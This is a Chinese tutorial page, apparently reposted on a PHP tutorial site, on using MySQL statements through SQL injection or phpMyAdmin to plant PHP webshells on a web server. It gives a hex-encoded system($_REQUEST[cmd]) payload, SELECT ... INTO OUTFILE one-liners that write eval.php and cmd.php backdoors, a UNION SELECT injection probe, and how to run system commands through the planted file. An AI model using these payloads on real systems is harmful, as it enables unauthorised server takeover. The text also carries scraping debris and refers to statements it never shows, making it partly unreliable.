Mysql实例Mysql的语句生成后门木马的方法

《Mysql实例Mysql的语句生成后门木马的方法》要点：
本文介绍了Mysql实例Mysql的语句生成后门木马的方法，希望对您有用。如果有疑问，可以联系我们。

咳咳,大家看看就好了,本人不负责所产生的后果MYSQL入门

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:2 3 <?php system($_REQUEST[cmd]);?>MYSQL入门

再通过 http://www.xxx.com/cmd.php?cmd=dir c: 就可以执行系统DOS命令!MYSQL入门

哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?MYSQL入门

就是<?php system($_REQUEST[cmd]);?>的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!MYSQL入门

?MYSQL入门

?浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQLMYSQL入门

昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法.
　　文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行)：
　　Drop TABLE IF EXISTS temp; //如果存在temp就删掉
　　Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
　　Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表
　　Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.php
　　Drop TABLE IF EXISTS temp; //删除temp(擦屁股o(∩_∩)o...)
　　这几句SQL很简单,我做了简单的注释.
　　不过想想我们在测试PHP的SQL漏洞的时候经常用如下的语句：
　　/**/UNION SELECT 1,2,4,5,6,7,8,9,10,11,12/*
　　然后返回的页面中可能会出现1~12之间的数字.这里加入数字3显示出来了.
　　如果我们把上面这句改成/**/UNION SELECT 1,'zerosoul',12/*,则返回页面上次显示3的地方会显示zerosoul.
　　也就是说如果我们的select语句后面不带from table语句的话,我们说查询的数字或字符会直接返回到查询结果里.
　　既然这样,我们为何还要那么麻烦去建一个表,先导入数据,再导出这样折腾呢.
　　有了这个思路,上面那一大段到出一句话的SQL代码可以直接简化到一句:
　　
Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';MYSQL入门

　　这样做不但简单明了,而且避免了误删别人的数据.以上所述就是本文的全部内容了,希望大家能够喜欢.MYSQL入门

?MYSQL入门

欢迎参与《Mysql实例Mysql的语句生成后门木马的方法》讨论，分享您的想法，编程之家 52php.cn为您提供专业教程。

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!